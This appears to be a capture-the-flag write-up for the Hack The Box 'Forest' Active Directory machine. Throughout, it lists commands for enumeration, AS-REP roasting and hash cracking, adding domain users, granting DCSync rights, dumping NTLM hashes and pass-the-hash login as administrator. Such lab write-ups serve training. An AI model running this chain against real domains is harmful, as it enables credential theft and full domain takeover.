Ping
Nmap Scans
mapit 10.10.10.161
Nmap Default Scan
Nmap Service and Script Scan
Nmap All Port Scan
Nmap Service and Script Scan for New ports found
Smb is not vulnerable, and after a lot of enumeration with smb and ldap services, I got Usernames and built in groups and AD environment info’s using bot ldapsearch and enum4linux, below are the command I have used, I can’t attach Screen shots, because the outputs are in enormous amount.
enum4linux -a 10.10.10.161
ldapsearch -v -x -b "DC=htb,DC=local" -H "ldap://10.10.10.161" "(objectclass=*)" > ldap.txt
Finally got some useful info while As-rep Roasting without username and password
impacket-GetNPUsers htb.local/ -dc-ip 10.10.10.161 -request
Will Jump to Initial Foothold…!
Will crack the hash using John, I have saved the hash in a file named asrep.hash
john --wordlist=/usr/share/wordlists/rockyou.txt asrep.hash
So the creds is svc-alfresco:s3rvice
We can Now list Shares
crackmapexec smb 10.10.10.161 -u svc-alfresco -p "s3rvice" --shares
We can get session using winrm
crackmapexec winrm 10.10.10.161 -u svc-alfresco -p "s3rvice"
Using Evil-Winrm
evil-winrm -i 10.10.10.161 -u svc-alfresco -p "s3rvice"
User.txt
Will Jump to Privilege Escalation…!
Will check our Privileges
whoami /priv
We can computers to domain
We can add up to 10 computers
Get-ADDomain | Select-Object -ExpandProperty DistinguishedName | Get-ADObject -Properties 'ms-DS-MachineAccountQuota'
Will Add computer and Impersonate Administrator
impacket-addcomputer htb.local/svc-alfresco -dc-ip 10.10.10.161 -computer-name 'pwned$' -computer-pass 'pwned@3000'
But we can’t set delegation rights to impersonate the Administrator, will find another way, will gather Ad info using Sharphound.
Firstly we are in the group Service Accounts
Run Sharp hound
Import-Module ./sharp.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\svc-alfresco\Desktop\ -OutputPrefix "forest"
Lets Transfer the .zip file to our kali and analyse using Bloodhound
As we are the member of Account operators, we can create users in domain and manage the group and its memberships.
Will create a user first
net user rosh pwn@3000 /add /domain
As we have generic all permission on the system
So first we add user rosh to Exchange Windows Permissions group
net group "Exchange Windows Permissions" rosh /add /domain
Will give this group DCSync rights
$secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr; Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'rosh' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync
Will use Secretsdump to get NYLM hashes of users
impacket-secretsdump rosh:pwn@3000@10.10.10.161
Got Admin’s NTLM
Will get a session using Pkexec
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@10.10.10.161
root.txt
Done with Forest…:)